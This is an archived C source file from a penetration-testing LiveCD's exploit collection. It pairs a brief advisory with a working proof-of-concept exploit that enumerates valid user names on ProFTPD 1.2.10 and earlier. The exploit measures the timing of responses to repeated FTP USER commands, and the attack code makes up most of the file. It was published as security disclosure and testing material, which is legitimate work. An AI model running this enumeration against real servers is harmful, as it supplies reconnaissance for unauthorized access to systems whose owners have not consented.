home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / proftpd / userenum.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.1 KB  |  61 lines
  1. /* 
  2. Details 
  3. Vulnerable Systems:
  4. * ProFTPD Version 1.2.10 and below
  5.  
  6. It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There is a very small (but significant) difference in time delay of code execution path between valid and non-valid user names. That can be used to remotely determine the difference between existent and non-existent users. The time delay can be measured by using a simple FTP client that will calculate elapsed time between 'USER' command sent by client, and the server response. Because of the very short response period, elapsed time should be measured in microseconds.
  7.  
  8. Proof of Concept Code:
  9. LSS has developed simple PoC exploit that is presented here:
  10.  
  11. // ProFTPd remote users discovery based on code execution time - POC exploit
  12. // Coded by Leon Juranic // http://www.lss.hr
  13. */
  14.  
  15. #include <sys/socket.h>
  16. #include <sys/types.h>
  17. #include <stdio.h>
  18. #include <arpa/inet.h>
  19. #include <sys/time.h>
  20.  
  21. #define PORT 21
  22. #define PROBE 8
  23.  
  24. main (int argc, char **argv)
  25. {
  26. int sock,n,y;
  27. long dist,stat=0;
  28. struct sockaddr_in sin;
  29. char buf[1024], buf2[1024];
  30. struct timeval tv, tv2;
  31. struct timezone tz, tz2;
  32.  
  33. printf ("Proftpd remote users discovery exploit\n"
  34. " Coded by Leon / LSS Security\n"
  35. ">-------------------------------------<\n");
  36.  
  37. if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }
  38.  
  39. sock = socket (AF_INET, SOCK_STREAM, 0);
  40. sin.sin_family = AF_INET;
  41. sin.sin_port = htons (PORT);
  42. sin.sin_addr.s_addr = inet_addr (argv[1]);
  43. bzero (sin.sin_zero,8);
  44.  
  45. connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));
  46.  
  47. printf ("Login time: ");
  48. n = read (sock,buf2, sizeof(buf2));
  49. for (y=0;y<PROBE;y++) {
  50. gettimeofday (&tv,&tz);
  51. snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
  52. write (sock, buf, strlen(buf));
  53. n = read (sock,buf2, sizeof(buf2));
  54. gettimeofday (&tv2,&tz2);
  55. dist =tv2.tv_usec - tv.tv_usec;
  56. stat += dist;
  57. printf (" %d |",dist);
  58. }
  59. printf ("\nAvrg: %d\n",(stat/PROBE));
  60. close (sock);
  61. }